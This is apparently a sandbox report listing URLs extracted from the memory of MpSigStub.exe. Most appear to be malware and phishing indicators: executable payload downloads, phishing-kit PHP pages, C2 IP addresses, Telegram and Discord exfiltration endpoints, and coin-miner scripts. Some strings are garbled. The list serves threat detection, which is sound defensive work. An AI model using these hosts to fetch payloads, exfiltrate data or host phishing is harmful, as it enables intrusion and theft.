Source: MpSigStub.exe, 00000024.00000003.6279581351.00000197A4A76000.00000004.00000001.sdmp	String found in binary or memory: http://ys.cn.yahoo.com/mohu/index.html?p=%s
Source: MpSigStub.exe, 00000024.00000003.6435021591.00000197A4A76000.00000004.00000001.sdmp	String found in binary or memory: http://yuksekovabali.com/rgvtr6wcaw2yyy6pkz6qvrj6)
Source: MpSigStub.exe, 00000024.00000003.6293664511.00000197A3192000.00000004.00000001.sdmp	String found in binary or memory: http://yupsearch.com
Source: MpSigStub.exe, 00000024.00000003.6319752266.00000197A3FE5000.00000004.00000001.sdmp	String found in binary or memory: http://yy.web1000wip.com:4567/bnb/css.js
Source: MpSigStub.exe, 00000024.00000003.6283505070.00000197A475E000.00000004.00000001.sdmp	String found in binary or memory: http://z1.nf-2.net/512.txt
Source: MpSigStub.exe, 00000024.00000003.6430342028.00000197A4BC0000.00000004.00000001.sdmp	String found in binary or memory: http://z360.net/
Source: MpSigStub.exe, 00000024.00000003.6435742963.00000197A3D91000.00000004.00000001.sdmp	String found in binary or memory: http://z7v8.fellatiomovefilehost.net/movie.php?id=movies_n01.wmv&sid=
Source: MpSigStub.exe, 00000024.00000003.6312003576.00000197A3DD5000.00000004.00000001.sdmp	String found in binary or memory: http://zaxarstore2.com/download.php
Source: MpSigStub.exe, 00000024.00000003.6277859035.00000197A392F000.00000004.00000001.sdmp	String found in binary or memory: http://zero.allgreathost.com
Source: MpSigStub.exe, 00000024.00000003.6277859035.00000197A392F000.00000004.00000001.sdmp	String found in binary or memory: http://zero.bestmanage1.org
Source: MpSigStub.exe, 00000024.00000003.6277859035.00000197A392F000.00000004.00000001.sdmp	String found in binary or memory: http://zero.bestmanage2.org
Source: MpSigStub.exe, 00000024.00000003.6277859035.00000197A392F000.00000004.00000001.sdmp	String found in binary or memory: http://zero.bestmanage3.org
Source: MpSigStub.exe, 00000024.00000003.6277859035.00000197A392F000.00000004.00000001.sdmp	String found in binary or memory: http://zero.sisdotnet.com
Source: MpSigStub.exe, 00000024.00000003.6277859035.00000197A392F000.00000004.00000001.sdmp	String found in binary or memory: http://zero.xujace.com
Source: MpSigStub.exe, 00000024.00000003.6345553259.00000197A36F1000.00000004.00000001.sdmp	String found in binary or memory: http://zhsh.j.nj.twsapp.com
Source: MpSigStub.exe, 00000024.00000003.6319752266.00000197A3FE5000.00000004.00000001.sdmp	String found in binary or memory: http://zief.pl/rc/
Source: MpSigStub.exe, 00000024.00000003.6290858289.00000197A33BE000.00000004.00000001.sdmp	String found in binary or memory: http://zigyyt.com/trix.exe
Source: MpSigStub.exe, 00000024.00000003.6440763384.00000197A4E29000.00000004.00000001.sdmp	String found in binary or memory: http://zillot.kz/System/mysql/users.php
Source: MpSigStub.exe, 00000024.00000003.6439501262.00000197A4A33000.00000004.00000001.sdmp	String found in binary or memory: http://zilmaraalencar.com.br/layouts/plugins/editors/tinymce/field/zzurphy.php
Source: MpSigStub.exe, 00000024.00000003.6441079311.00000197A4E6A000.00000004.00000001.sdmp	String found in binary or memory: http://zlnewly.hk/fun.exe
Source: MpSigStub.exe, 00000024.00000003.6274276311.00000197A2E51000.00000004.00000001.sdmp	String found in binary or memory: http://zr.webhop.org:1337
Source: MpSigStub.exe, 00000024.00000003.6323790490.00000197A4866000.00000004.00000001.sdmp	String found in binary or memory: http://zsnews.zhongsou.com/zsnews.cgi?tps=3&agent=%s&word=
Source: MpSigStub.exe, 00000024.00000003.6325389459.00000197A496F000.00000004.00000001.sdmp	String found in binary or memory: http://zsxz.zhongsou.com/route/
Source: MpSigStub.exe, 00000024.00000003.6440763384.00000197A4E29000.00000004.00000001.sdmp	String found in binary or memory: http://zxtenrnewlaunchinworldwide.mangospot.net/.-..................................................
Source: MpSigStub.exe, 00000024.00000003.6430342028.00000197A4BC0000.00000004.00000001.sdmp	String found in binary or memory: http://zz.8282.space/nw/ss/
Source: MpSigStub.exe, 00000024.00000003.6441079311.00000197A4E6A000.00000004.00000001.sdmp	String found in binary or memory: http://zzease.com/
Source: MpSigStub.exe, 00000024.00000003.6441079311.00000197A4E6A000.00000004.00000001.sdmp	String found in binary or memory: http://zzobpk.ba/
Source: MpSigStub.exe, 00000024.00000003.6330297949.00000197A369B000.00000004.00000001.sdmp	String found in binary or memory: https://%s/ews/exchange.asmx
Source: MpSigStub.exe, 00000024.00000003.6345553259.00000197A36F1000.00000004.00000001.sdmp	String found in binary or memory: https://%s/owa/auth.owa
Source: MpSigStub.exe, 00000024.00000003.6345553259.00000197A36F1000.00000004.00000001.sdmp	String found in binary or memory: https://%s/owa/lang.owa
Source: MpSigStub.exe, 00000024.00000003.6318964208.00000197A48A9000.00000004.00000001.sdmp	String found in binary or memory: https://%s/owa/meetingpollhandler.ashx
Source: MpSigStub.exe, 00000024.00000003.6272159714.00000197A331E000.00000004.00000001.sdmp	String found in binary or memory: https://%s/si.jsp
Source: MpSigStub.exe, 00000024.00000003.6430342028.00000197A4BC0000.00000004.00000001.sdmp	String found in binary or memory: https://09e26c1d.ngrok.io/exploit/jprotected.exe
Source: MpSigStub.exe, 00000024.00000003.6432316317.00000197A4DA4000.00000004.00000001.sdmp	String found in binary or memory: https://0utl00k.net/docs
Source: MpSigStub.exe, 00000024.00000003.6439501262.00000197A4A33000.00000004.00000001.sdmp	String found in binary or memory: https://145855projectframingltd-my.sharepoint.com/:b:/g/personal/jan_projectframing_com/evmq9_ggpulc
Source: MpSigStub.exe, 00000024.00000003.6294257169.00000197A398C000.00000004.00000001.sdmp	String found in binary or memory: https://179.43.134.164:443
Source: MpSigStub.exe, 00000024.00000003.6294257169.00000197A398C000.00000004.00000001.sdmp	String found in binary or memory: https://185.118.167.189:44
Source: MpSigStub.exe, 00000024.00000003.6307634469.00000197A2ED4000.00000004.00000001.sdmp	String found in binary or memory: https://185.180.199.102/
Source: MpSigStub.exe, 00000024.00000003.6321843775.00000197A2FD4000.00000004.00000001.sdmp	String found in binary or memory: https://1876479389.rsc.cdn77.org/p2r.php
Source: MpSigStub.exe, 00000024.00000003.6429813058.00000197A4697000.00000004.00000001.sdmp	String found in binary or memory: https://193.29.15.147
Source: MpSigStub.exe, 00000024.00000003.6441079311.00000197A4E6A000.00000004.00000001.sdmp	String found in binary or memory: https://1drv.ms/w/s
Source: MpSigStub.exe, 00000024.00000003.6294257169.00000197A398C000.00000004.00000001.sdmp	String found in binary or memory: https://23.95.238.122:443
Source: MpSigStub.exe, 00000024.00000003.6429813058.00000197A4697000.00000004.00000001.sdmp	String found in binary or memory: https://2no.co/
Source: MpSigStub.exe, 00000024.00000003.6307634469.00000197A2ED4000.00000004.00000001.sdmp	String found in binary or memory: https://2no.co/1spk97.gif
Source: MpSigStub.exe, 00000024.00000003.6429813058.00000197A4697000.00000004.00000001.sdmp	String found in binary or memory: https://42801.weebly.com/uploads/
Source: MpSigStub.exe, 00000024.00000003.6439090002.00000197A49F2000.00000004.00000001.sdmp	String found in binary or memory: https://645tgvew.gb.net/gtrfeef3r/?wv54544f=gv445g5g55
Source: MpSigStub.exe, 00000024.00000003.6290223213.00000197A39E2000.00000004.00000001.sdmp	String found in binary or memory: https://7college.du.ac.bd/upload/mukrimul/0/beans.php
Source: MpSigStub.exe, 00000024.00000003.6430707943.00000197A4B3C000.00000004.00000001.sdmp	String found in binary or memory: https://a.doko.moe/uvjwpr.sct
Source: MpSigStub.exe, 00000024.00000003.6287974454.00000197A4D37000.00000004.00000001.sdmp	String found in binary or memory: https://a.pomf.cat/
Source: MpSigStub.exe, 00000024.00000003.6434542406.00000197A437F000.00000004.00000001.sdmp	String found in binary or memory: https://a.pomfe.co/
Source: MpSigStub.exe, 00000024.00000003.6327908307.00000197A40EC000.00000004.00000001.sdmp	String found in binary or memory: https://a.top4top.net/
Source: MpSigStub.exe, 00000024.00000003.6338261504.00000197A4590000.00000004.00000001.sdmp	String found in binary or memory: https://a12.aioecoin
Source: MpSigStub.exe, 00000024.00000003.6271076584.00000197A3A37000.00000004.00000001.sdmp	String found in binary or memory: https://a12.aioecoin.org/609710d5b915bc7
Source: MpSigStub.exe, 00000024.00000003.6306777580.00000197A39F4000.00000004.00000001.sdmp	String found in binary or memory: https://aamilah.co.uk/ds/0302.gif
Source: MpSigStub.exe, 00000024.00000003.6338261504.00000197A4590000.00000004.00000001.sdmp	String found in binary or memory: https://ab.v-mail.online/?e=
Source: MpSigStub.exe, 00000024.00000003.6437085765.00000197A4B7D000.00000004.00000001.sdmp	String found in binary or memory: https://abgchina.org/roundcubes/roundcube/soundcube.web/1file.php
Source: MpSigStub.exe, 00000024.00000003.6271796009.00000197A32DD000.00000004.00000001.sdmp	String found in binary or memory: https://abiesalamat.com/wp-brent/toolzlord.php
Source: MpSigStub.exe, 00000024.00000003.6307634469.00000197A2ED4000.00000004.00000001.sdmp	String found in binary or memory: https://abpandh.com/drms/fert.html
Source: MpSigStub.exe, 00000024.00000003.6324198203.00000197A492C000.00000004.00000001.sdmp	String found in binary or memory: https://abpnco.com/naywplqm/04.html
Source: MpSigStub.exe, 00000024.00000003.6429536769.00000197A4656000.00000004.00000001.sdmp	String found in binary or memory: https://account.qq.com/cgi-bin/auth_forget
Source: MpSigStub.exe, 00000024.00000003.6336985744.00000197A3426000.00000004.00000001.sdmp, MpSigStub.exe, 00000024.00000003.6342863444.00000197A4F72000.00000004.00000001.sdmp	String found in binary or memory: https://accounts.google.com/o/oauth2/auth
Source: MpSigStub.exe, 00000024.00000003.6354030665.00000197A41B3000.00000004.00000001.sdmp	String found in binary or memory: https://accounts.google.com/o/oauth2/token
Source: MpSigStub.exe, 00000024.00000003.6437789522.00000197A392D000.00000004.00000001.sdmp	String found in binary or memory: https://acquatrat.com.br/wp-admin/maint/audio2/
Source: MpSigStub.exe, 00000024.00000003.6323089969.00000197A3C04000.00000004.00000001.sdmp	String found in binary or memory: https://activate.utorrent.com
Source: MpSigStub.exe, 00000024.00000003.6290858289.00000197A33BE000.00000004.00000001.sdmp	String found in binary or memory: https://addledsteamb.xyz/BAYgODA0NUQ2OEY1RTA2ODg4RDhCQzlEQzRBRUU3QTA5OUI=
Source: MpSigStub.exe, 00000024.00000003.6438240606.00000197A36DD000.00000004.00000001.sdmp	String found in binary or memory: https://addledsteamb.xyz/baygoda0nuq2oey1rta2odg4rdhcqzleqzrbruu3qta5oui=
Source: MpSigStub.exe, 00000024.00000003.6430077076.00000197A46D9000.00000004.00000001.sdmp	String found in binary or memory: https://adegt.com/wp-includes/sodium_co
Source: MpSigStub.exe, 00000024.00000003.6271076584.00000197A3A37000.00000004.00000001.sdmp	String found in binary or memory: https://adop109.000webhostapp.com/index.html
Source: MpSigStub.exe, 00000024.00000003.6308253805.00000197A3EDD000.00000004.00000001.sdmp	String found in binary or memory: https://aframe.io/releases/0.7.1/aframe.min.js
Source: MpSigStub.exe, 00000024.00000003.6312003576.00000197A3DD5000.00000004.00000001.sdmp	String found in binary or memory: https://agent.wizztrakys.com/a_
Source: MpSigStub.exe, 00000024.00000003.6438240606.00000197A36DD000.00000004.00000001.sdmp	String found in binary or memory: https://agilefield53.com/rb/excelzz/index.php
Source: MpSigStub.exe, 00000024.00000003.6307634469.00000197A2ED4000.00000004.00000001.sdmp	String found in binary or memory: https://ahtaeereddit.org
Source: MpSigStub.exe, 00000024.00000003.6441079311.00000197A4E6A000.00000004.00000001.sdmp	String found in binary or memory: https://aimsnotification.info/soyakim
Source: MpSigStub.exe, 00000024.00000003.6437789522.00000197A392D000.00000004.00000001.sdmp	String found in binary or memory: https://airsoftne.com.br/wp-admin/maint/redirect/
Source: MpSigStub.exe, 00000024.00000003.6338261504.00000197A4590000.00000004.00000001.sdmp	String found in binary or memory: https://ajdepehlisale.gb.net/document.php
Source: MpSigStub.exe, 00000024.00000003.6436377560.00000197A4C85000.00000004.00000001.sdmp	String found in binary or memory: https://alfahad.io/ocart2/admin/controller/catalog/gr.mpwq
Source: MpSigStub.exe, 00000024.00000003.6290223213.00000197A39E2000.00000004.00000001.sdmp	String found in binary or memory: https://allcityroofers.com/wp-admin/spf/hnr/tap.php
Source: MpSigStub.exe, 00000024.00000003.6306392748.00000197A44CA000.00000004.00000001.sdmp	String found in binary or memory: https://alpha.com/epicapp/createnode?affiliateId=%s&subId=%s
Source: MpSigStub.exe, 00000024.00000003.6306392748.00000197A44CA000.00000004.00000001.sdmp	String found in binary or memory: https://alpha.com/epicapp/createnode?affiliateId=%s&subId=%sxe
Source: MpSigStub.exe, 00000024.00000003.6437415503.00000197A38EC000.00000004.00000001.sdmp	String found in binary or memory: https://alpine.kz/ds/161120.gif
Source: MpSigStub.exe, 00000024.00000003.6290858289.00000197A33BE000.00000004.00000001.sdmp	String found in binary or memory: https://alwaslapps.com/attachment/attach.php
Source: MpSigStub.exe, 00000024.00000003.6325389459.00000197A496F000.00000004.00000001.sdmp	String found in binary or memory: https://am.localstormwatch00.localstormw
Source: MpSigStub.exe, 00000024.00000003.6434542406.00000197A437F000.00000004.00000001.sdmp	String found in binary or memory: https://amigosforever.net/d/
Source: MpSigStub.exe, 00000024.00000003.6435021591.00000197A4A76000.00000004.00000001.sdmp	String found in binary or memory: https://andyscars.co.uk/signedz/index.html)
Source: MpSigStub.exe, 00000024.00000003.6428495405.00000197A2E93000.00000004.00000001.sdmp	String found in binary or memory: https://angel.ac.nz/wp-content/uploads/2019/10/THEBRKMZ.ocx
Source: MpSigStub.exe, 00000024.00000003.6437415503.00000197A38EC000.00000004.00000001.sdmp	String found in binary or memory: https://anhii.com/ds/161120.gif
Source: MpSigStub.exe, 00000024.00000003.6322693408.00000197A3BC3000.00000004.00000001.sdmp	String found in binary or memory: https://ankiitpatel.blogspot.com/
Source: MpSigStub.exe, 00000024.00000003.6310450817.00000197A4AFA000.00000004.00000001.sdmp	String found in binary or memory: https://anonfiles.com/
Source: MpSigStub.exe, 00000024.00000003.6320126679.00000197A4068000.00000004.00000001.sdmp	String found in binary or memory: https://anspa.dyndns.dk/dr1/next.php
Source: MpSigStub.exe, 00000024.00000003.6274632476.00000197A2E92000.00000004.00000001.sdmp	String found in binary or memory: https://api.edgelauncher.com
Source: MpSigStub.exe, 00000024.00000003.6278189283.00000197A3970000.00000004.00000001.sdmp	String found in binary or memory: https://api.github.com
Source: MpSigStub.exe, 00000024.00000003.6435021591.00000197A4A76000.00000004.00000001.sdmp	String found in binary or memory: https://api.imgur.com/3/upload.xml
Source: MpSigStub.exe, 00000024.00000003.6440763384.00000197A4E29000.00000004.00000001.sdmp	String found in binary or memory: https://api.ipify.org/
Source: MpSigStub.exe, 00000024.00000003.6318964208.00000197A48A9000.00000004.00000001.sdmp	String found in binary or memory: https://api.l33tsite.info/lib/
Source: MpSigStub.exe, 00000024.00000003.6312336240.00000197A3E16000.00000004.00000001.sdmp	String found in binary or memory: https://api.tdameritrade.com/v1/accounts
Source: MpSigStub.exe, 00000024.00000003.6430077076.00000197A46D9000.00000004.00000001.sdmp	String found in binary or memory: https://api.telegram.org/bot
Source: MpSigStub.exe, 00000024.00000003.6428495405.00000197A2E93000.00000004.00000001.sdmp	String found in binary or memory: https://api.telegram.org/bot%telegramapi%/
Source: MpSigStub.exe, 00000024.00000003.6304100006.00000197A2F93000.00000004.00000001.sdmp, MpSigStub.exe, 00000024.00000003.6272683059.00000197A4405000.00000004.00000001.sdmp	String found in binary or memory: https://app.box.com/s/q5bvxbs72948q6t7n5nrft0lnuddkj7g
Source: MpSigStub.exe, 00000024.00000003.6441407992.00000197A4404000.00000004.00000001.sdmp	String found in binary or memory: https://app.box.com/shared/static/oy44fta2sdgxuuch02tkyvmez9zssxqb.zip
Source: MpSigStub.exe, 00000024.00000003.6415513577.00000197A3D91000.00000004.00000001.sdmp, MpSigStub.exe, 00000024.00000003.6338261504.00000197A4590000.00000004.00000001.sdmp	String found in binary or memory: https://appengine.google.com/_ah/logout?continue=http
Source: MpSigStub.exe, 00000024.00000003.6351148277.00000197A49F2000.00000004.00000001.sdmp	String found in binary or memory: https://apps-newsorders.servehttp.com/_
Source: MpSigStub.exe, 00000024.00000003.6274276311.00000197A2E51000.00000004.00000001.sdmp	String found in binary or memory: https://apps-nosmile.servehttp.com/_
Source: MpSigStub.exe, 00000024.00000003.6335436052.00000197A3016000.00000004.00000001.sdmp	String found in binary or memory: https://appupdate.herokuapp.com
Source: MpSigStub.exe, 00000024.00000003.6441407992.00000197A4404000.00000004.00000001.sdmp	String found in binary or memory: https://arabictv.ml/catalog/controlyte6;ler/payment/mollie-api-client/build/YS0LfExPc7MJU3.php
Source: MpSigStub.exe, 00000024.00000003.6323089969.00000197A3C04000.00000004.00000001.sdmp	String found in binary or memory: https://archaeology.ideaschema.com/hiwork.php
Source: MpSigStub.exe, 00000024.00000003.6272683059.00000197A4405000.00000004.00000001.sdmp	String found in binary or memory: https://armybar.hopto.org/remoteload.dotm
Source: MpSigStub.exe, 00000024.00000003.6441407992.00000197A4404000.00000004.00000001.sdmp	String found in binary or memory: https://arteecaligrafia.vI&8&$Ocom.br/imagens/fotos/thumbs/MupJ4cvI&8&$OZzxoElmn.php
Source: MpSigStub.exe, 00000024.00000003.6315850680.00000197A403E000.00000004.00000001.sdmp	String found in binary or memory: https://userkade.com/21.psd
Source: MpSigStub.exe, 00000024.00000003.6439967654.00000197A4446000.00000004.00000001.sdmp	String found in binary or memory: https://arti-insaat.com/wp-includes/rest-api/report-dh1.php
Source: MpSigStub.exe, 00000024.00000003.6441407992.00000197A4404000.00000004.00000001.sdmp	String found in binary or memory: https://asgvprotecao.c
Source: MpSigStub.exe, 00000024.00000003.6435021591.00000197A4A76000.00000004.00000001.sdmp	String found in binary or memory: https://asgvprotecao.com.br/wa_php/clZ&LpN-omp/klbd5vxr6mf38o/YxSlZ&LpN-slZ&LpN-9udRlZ&LpN-8U.plZ&Lp
Source: MpSigStub.exe, 00000024.00000003.6330297949.00000197A369B000.00000004.00000001.sdmp	String found in binary or memory: https://asushotfix.com/.
Source: MpSigStub.exe, 00000024.00000003.6435021591.00000197A4A76000.00000004.00000001.sdmp	String found in binary or memory: https://atalent.fi/avoimet-tyopaikat
Source: MpSigStub.exe, 00000024.00000003.6307248389.00000197A3A78000.00000004.00000001.sdmp	String found in binary or memory: https://ate.bz/now.php
Source: MpSigStub.exe, 00000024.00000003.6268699778.00000197A4FF7000.00000004.00000001.sdmp	String found in binary or memory: https://auth-server4.xyz/processor.php
Source: MpSigStub.exe, 00000024.00000003.6312336240.00000197A3E16000.00000004.00000001.sdmp	String found in binary or memory: https://auth.tdameritrade.com/auth?response_type=code&redirect_uri=
Source: MpSigStub.exe, 00000024.00000003.6318964208.00000197A48A9000.00000004.00000001.sdmp	String found in binary or memory: https://authedmine.com/lib/
Source: MpSigStub.exe, 00000024.00000003.6351148277.00000197A49F2000.00000004.00000001.sdmp	String found in binary or memory: https://autobusinessfunnel.com/wp-admin/css/colors/
Source: MpSigStub.exe, 00000024.00000003.6439501262.00000197A4A33000.00000004.00000001.sdmp	String found in binary or memory: https://avanajewelry.com/dddsedologhfmkj/aabbbygtvjjytgfxjhmgncgi%20in%20_forma.php
Source: MpSigStub.exe, 00000024.00000003.6320453518.00000197A412F000.00000004.00000001.sdmp	String found in binary or memory: https://avart.org/hdhdhk/xls/index.php?
Source: MpSigStub.exe, 00000024.00000003.6336985744.00000197A3426000.00000004.00000001.sdmp	String found in binary or memory: https://azur.melhordev.com/.well-known/acme-challenge/std/php/
Source: MpSigStub.exe, 00000024.00000003.6318964208.00000197A48A9000.00000004.00000001.sdmp	String found in binary or memory: https://b.top4top.io/p_15665ejq60.jpg
Source: MpSigStub.exe, 00000024.00000003.6441079311.00000197A4E6A000.00000004.00000001.sdmp	String found in binary or memory: https://backparloursoup.xyz//meme/cors/send.php
Source: MpSigStub.exe, 00000024.00000003.6318199174.00000197A3059000.00000004.00000001.sdmp	String found in binary or memory: https://bankline.itau.com.br/
Source: MpSigStub.exe, 00000024.00000003.6331200392.00000197A38EC000.00000004.00000001.sdmp	String found in binary or memory: https://bankline.itau.com.br/GRIPNET/bklcgi.exe
Source: MpSigStub.exe, 00000024.00000003.6290858289.00000197A33BE000.00000004.00000001.sdmp	String found in binary or memory: https://bankss-71.ml/2.dll
Source: MpSigStub.exe, 00000024.00000003.6318964208.00000197A48A9000.00000004.00000001.sdmp	String found in binary or memory: https://batc.dyndns.dk/minto3/next.php
Source: MpSigStub.exe, 00000024.00000003.6304100006.00000197A2F93000.00000004.00000001.sdmp	String found in binary or memory: https://bb.realestateprivateportfolio.com/img/
Source: MpSigStub.exe, 00000024.00000003.6349678928.00000197A3C89000.00000004.00000001.sdmp	String found in binary or memory: https://bbcgroup.co.in/qpipsriug.php
Source: MpSigStub.exe, 00000024.00000003.6428495405.00000197A2E93000.00000004.00000001.sdmp	String found in binary or memory: https://beer.appi.top/?74c96ea1gmz9qipluhdvtw6q7ekn6e0upb
Source: MpSigStub.exe, 00000024.00000003.6277859035.00000197A392F000.00000004.00000001.sdmp	String found in binary or memory: https://beetibutron.xyz/rowdy/brand.php
Source: MpSigStub.exe, 00000024.00000003.6273475176.00000197A3D51000.00000004.00000001.sdmp	String found in binary or memory: https://begumprinters.com/css/absa/php/absajslogo.php?r=
Source: MpSigStub.exe, 00000024.00000003.6287974454.00000197A4D37000.00000004.00000001.sdmp	String found in binary or memory: https://behendige-boxers.nl/ds/0902.gif
Source: MpSigStub.exe, 00000024.00000003.6437415503.00000197A38EC000.00000004.00000001.sdmp	String found in binary or memory: https://bemojo.com/ds/161120.gif
Source: MpSigStub.exe, 00000024.00000003.6304100006.00000197A2F93000.00000004.00000001.sdmp	String found in binary or memory: https://benabase.com/cgi_bin/amvzdxmuc3vhcmv6qhzvbg90zweuy29t
Source: MpSigStub.exe, 00000024.00000003.6326212702.00000197A31D5000.00000004.00000001.sdmp	String found in binary or memory: https://benchlings.com/
Source: MpSigStub.exe, 00000024.00000003.6320126679.00000197A4068000.00000004.00000001.sdmp	String found in binary or memory: https://benchlings.com/xoxo/next.php
Source: MpSigStub.exe, 00000024.00000003.6290858289.00000197A33BE000.00000004.00000001.sdmp	String found in binary or memory: https://berlitzalahsa.sa/sport/rockstar.php
Source: MpSigStub.exe, 00000024.00000003.6330297949.00000197A369B000.00000004.00000001.sdmp	String found in binary or memory: https://besthybridcar.blogspot.com/
Source: MpSigStub.exe, 00000024.00000003.6323089969.00000197A3C04000.00000004.00000001.sdmp	String found in binary or memory: https://bigup.marketing/wp-content/plugins/seo_index/hloym4kndci.php
Source: MpSigStub.exe, 00000024.00000003.6287974454.00000197A4D37000.00000004.00000001.sdmp	String found in binary or memory: https://bipblocker.com/get_config/
Source: MpSigStub.exe, 00000024.00000003.6323451282.00000197A3C46000.00000004.00000001.sdmp	String found in binary or memory: https://bit.ly
Source: MpSigStub.exe, 00000024.00000003.6317535190.00000197A4F30000.00000004.00000001.sdmp	String found in binary or memory: https://bit.ly/
Source: MpSigStub.exe, 00000024.00000003.6430707943.00000197A4B3C000.00000004.00000001.sdmp	String found in binary or memory: https://bit.ly/2g8qrgl
Source: MpSigStub.exe, 00000024.00000003.6436704102.00000197A4AFA000.00000004.00000001.sdmp	String found in binary or memory: https://bit.ly/2zbes5a
Source: MpSigStub.exe, 00000024.00000003.6291090515.00000197A33E4000.00000004.00000001.sdmp	String found in binary or memory: https://bit.ly/3kthd4j
Source: MpSigStub.exe, 00000024.00000003.6348335236.00000197A3259000.00000004.00000001.sdmp	String found in binary or memory: https://bit.ly/3kvdcmi
Source: MpSigStub.exe, 00000024.00000003.6317535190.00000197A4F30000.00000004.00000001.sdmp, MpSigStub.exe, 00000024.00000003.6441079311.00000197A4E6A000.00000004.00000001.sdmp	String found in binary or memory: https://bitbucket.org/
Source: MpSigStub.exe, 00000024.00000003.6274276311.00000197A2E51000.00000004.00000001.sdmp	String found in binary or memory: https://bitbucket.org/kimrakfl33/git/raw/master/kinsingchmod
Source: MpSigStub.exe, 00000024.00000003.6429536769.00000197A4656000.00000004.00000001.sdmp	String found in binary or memory: https://bitly.com/
Source: MpSigStub.exe, 00000024.00000003.6439090002.00000197A49F2000.00000004.00000001.sdmp	String found in binary or memory: https://bjhvgft67rf.gb.net/vfeg877g7/?cvwrg3g=vv3g3v4f
Source: MpSigStub.exe, 00000024.00000003.6273475176.00000197A3D51000.00000004.00000001.sdmp	String found in binary or memory: https://bk.kv-dv8.club/?e=bbeckler
Source: MpSigStub.exe, 00000024.00000003.6336985744.00000197A3426000.00000004.00000001.sdmp	String found in binary or memory: https://blackberryizm.com/frontend/assets/images/favico/
Source: MpSigStub.exe, 00000024.00000003.6429813058.00000197A4697000.00000004.00000001.sdmp	String found in binary or memory: https://blackberryizm.com/frontend/assets/images/favico/reportmaersk.php
Source: MpSigStub.exe, 00000024.00000003.6441079311.00000197A4E6A000.00000004.00000001.sdmp	String found in binary or memory: https://blackstonesbarandgrill.net/wp-includes/js/service/jp/login.php
Source: MpSigStub.exe, 00000024.00000003.6323451282.00000197A3C46000.00000004.00000001.sdmp, MpSigStub.exe, 00000024.00000003.6273475176.00000197A3D51000.00000004.00000001.sdmp	String found in binary or memory: https://bm.jb-voice.online/?e=accounting
Source: MpSigStub.exe, 00000024.00000003.6434542406.00000197A437F000.00000004.00000001.sdmp	String found in binary or memory: https://bonshyonloire.ml/exploit/
Source: MpSigStub.exe, 00000024.00000003.6435021591.00000197A4A76000.00000004.00000001.sdmp	String found in binary or memory: https://boyscoutsram.com/c2hhd2v6x2jhbnvyaubiyxquy29t
Source: MpSigStub.exe, 00000024.00000003.6317535190.00000197A4F30000.00000004.00000001.sdmp	String found in binary or memory: https://bribble.com/
Source: MpSigStub.exe, 00000024.00000003.6437415503.00000197A38EC000.00000004.00000001.sdmp	String found in binary or memory: https://btchs.com.br/ds/161120.gif
Source: MpSigStub.exe, 00000024.00000003.6435021591.00000197A4A76000.00000004.00000001.sdmp	String found in binary or memory: https://builderdoc.org/life/direct.php)
Source: MpSigStub.exe, 00000024.00000003.6429813058.00000197A4697000.00000004.00000001.sdmp	String found in binary or memory: https://buildingsandpools.com/wp-content/iy6ux613260
Source: MpSigStub.exe, 00000024.00000003.6321843775.00000197A2FD4000.00000004.00000001.sdmp	String found in binary or memory: https://burnleyd.cf/brand.php
Source: MpSigStub.exe, 00000024.00000003.6435742963.00000197A3D91000.00000004.00000001.sdmp	String found in binary or memory: https://businessonline.o2.co.uk/
Source: MpSigStub.exe, 00000024.00000003.6351148277.00000197A49F2000.00000004.00000001.sdmp	String found in binary or memory: https://butikzai.blogspot.com/
Source: MpSigStub.exe, 00000024.00000003.6351148277.00000197A49F2000.00000004.00000001.sdmp	String found in binary or memory: https://bydinvestments.com/cache/rainer/258720/rainer.bauer
Source: MpSigStub.exe, 00000024.00000003.6323451282.00000197A3C46000.00000004.00000001.sdmp	String found in binary or memory: https://c-0li.club/?e=JPohlman
Source: MpSigStub.exe, 00000024.00000003.6437789522.00000197A392D000.00000004.00000001.sdmp	String found in binary or memory: https://c-up.xyz/
Source: MpSigStub.exe, 00000024.00000003.6321843775.00000197A2FD4000.00000004.00000001.sdmp	String found in binary or memory: https://cablenet.com.ec/drms/bb.html
Source: MpSigStub.exe, 00000024.00000003.6434542406.00000197A437F000.00000004.00000001.sdmp	String found in binary or memory: https://caixadirecta.cgd.pt
Source: MpSigStub.exe, 00000024.00000003.6305465801.00000197A4278000.00000004.00000001.sdmp	String found in binary or memory: https://calfeutragebprs%.com/wp%-content/image/s3%.php
Source: MpSigStub.exe, 00000024.00000003.6307634469.00000197A2ED4000.00000004.00000001.sdmp	String found in binary or memory: https://camillesanz.com/lib/status.js
Source: MpSigStub.exe, 00000024.00000003.6439501262.00000197A4A33000.00000004.00000001.sdmp	String found in binary or memory: https://canary.discord.com/api/webhooks/
Source: MpSigStub.exe, 00000024.00000003.6437789522.00000197A392D000.00000004.00000001.sdmp	String found in binary or memory: https://capirtos.r1-it.stora
Source: MpSigStub.exe, 00000024.00000003.6434542406.00000197A437F000.00000004.00000001.sdmp	String found in binary or memory: https://carmelavalles.com/site/wp-admin/
Source: MpSigStub.exe, 00000024.00000003.6324553749.00000197A3B81000.00000004.00000001.sdmp	String found in binary or memory: https://carpascapital.com/gbpg8mtsgbv/ka.html
Source: MpSigStub.exe, 00000024.00000003.6441079311.00000197A4E6A000.00000004.00000001.sdmp	String found in binary or memory: https://cartsmars.info/okmn/
Source: MpSigStub.exe, 00000024.00000003.6347522364.00000197A3B80000.00000004.00000001.sdmp	String found in binary or memory: https://casciscus.com/wp-admin/v4/
Source: MpSigStub.exe, 00000024.00000003.6337394565.00000197A4314000.00000004.00000001.sdmp	String found in binary or memory: https://casciscus.com/wp-admin/v4/pocket.php
Source: MpSigStub.exe, 00000024.00000003.6415513577.00000197A3D91000.00000004.00000001.sdmp	String found in binary or memory: https://cazala.github.io/coin-hive-proxy/client.js?
Source: MpSigStub.exe, 00000024.00000003.6273475176.00000197A3D51000.00000004.00000001.sdmp	String found in binary or memory: https://cctraff.ru/
Source: MpSigStub.exe, 00000024.00000003.6332222979.00000197A4170000.00000004.00000001.sdmp	String found in binary or memory: https://cdn-105.anonfiles.com/
Source: MpSigStub.exe, 00000024.00000003.6303130875.00000197A4DA4000.00000004.00000001.sdmp, MpSigStub.exe, 00000024.00000003.6332222979.00000197A4170000.00000004.00000001.sdmp	String found in binary or memory: https://cdn.discordapp.com/
Source: MpSigStub.exe, 00000024.00000003.6351148277.00000197A49F2000.00000004.00000001.sdmp	String found in binary or memory: https://cdn.discordapp.com/attachments
